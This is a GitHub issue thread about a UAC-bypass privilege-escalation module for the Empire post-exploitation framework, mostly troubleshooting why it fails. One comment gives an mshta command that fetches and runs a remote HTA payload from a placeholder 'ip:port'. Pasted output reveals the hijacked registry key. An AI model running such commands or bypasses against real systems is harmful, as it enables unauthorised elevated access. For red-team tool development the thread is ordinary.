Empire icon indicating copy to clipboard operation
Empire copied to clipboard

Published 20 hours ago verified publisher icon EmpireProject

Windows Local Privilege Escalation Module - SLUI BypassUAC

Open Truneski opened this issue 6 years ago • 7 comments

This is a simple privilege escalation module that was already written in PowerShell by gushmazuko:https://github.com/gushmazuko/WinBypass It works by simply taking a one liner (can be any) to execute our powershell empire payload and we get a high privilege Empire shell. Hopefully this helps someone out there like it did from my engagement today. If you have any questions feel free to ping me on twitter/slack and also feel free to improve in any way shape or form.

Truneski avatar Oct 04 '18 15:10 Truneski

Hi,

Unfortunately, your module fails on my lab.

On my W10 test machine: screenshot from 2018-10-04 21-38-59

On Empire side:

(Empire: powershell/privesc/bypassuac_slui) > Job started: G2XR3U


Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName   : command
PSDrive       : HKCU
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 
Name          : HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command

DelegateExecute : 
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\comman
                  d
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Am I missing something ?

:sunflower:

ThePirateWhoSmellsOfSunflowers avatar Oct 04 '18 19:10 ThePirateWhoSmellsOfSunflowers

Hmm, honestly I'm not sure. What I did what set the command to execute a hta file i.e set command "c:\windows\system32\mshta.exe http://ip:port/windows.hta"

So keep testing out new things.

Truneski avatar Oct 05 '18 07:10 Truneski

On another test VM: uac

However if I use the ps1 alone, it works.

:sunflower:

ThePirateWhoSmellsOfSunflowers avatar Oct 05 '18 09:10 ThePirateWhoSmellsOfSunflowers

Weeeelllllll, I think I misunderstood. From the beginning I tried to use your module like a normal empire bypass UAC module : launch it and wait for the new agent to pop. But in fact your module take a command parameter, mandatory but it is pre-filled with Default (?) hence the random error on my W10 machine.

I think you should rewrite your module in order to keep bypass UAC module architecture consistent. A privesc module (like a UAC bypass one) have to launch a second agent (elevated one). It must be easy to implement (see others UAC bypass modules)

:sunflower:

ThePirateWhoSmellsOfSunflowers avatar Oct 05 '18 10:10 ThePirateWhoSmellsOfSunflowers

It's the main hurdle I came across..adding a launcher to automatically execute. However, I urge you or anyone else for that(preferably more skilled than me) to look at the code and make improvements. I used the module to great effect on an engagement against a top tier EDR. ' Just wanted to submit it here and hopefully see if it can help anyone. That to me will be enough.

Truneski avatar Oct 05 '18 11:10 Truneski

I'll give a try to implement the correct method, I'll submit a new PR based on this one.

:sunflower:

ThePirateWhoSmellsOfSunflowers avatar Oct 08 '18 12:10 ThePirateWhoSmellsOfSunflowers

Awesome dude, I'd appreciate the help.

Truneski avatar Oct 08 '18 17:10 Truneski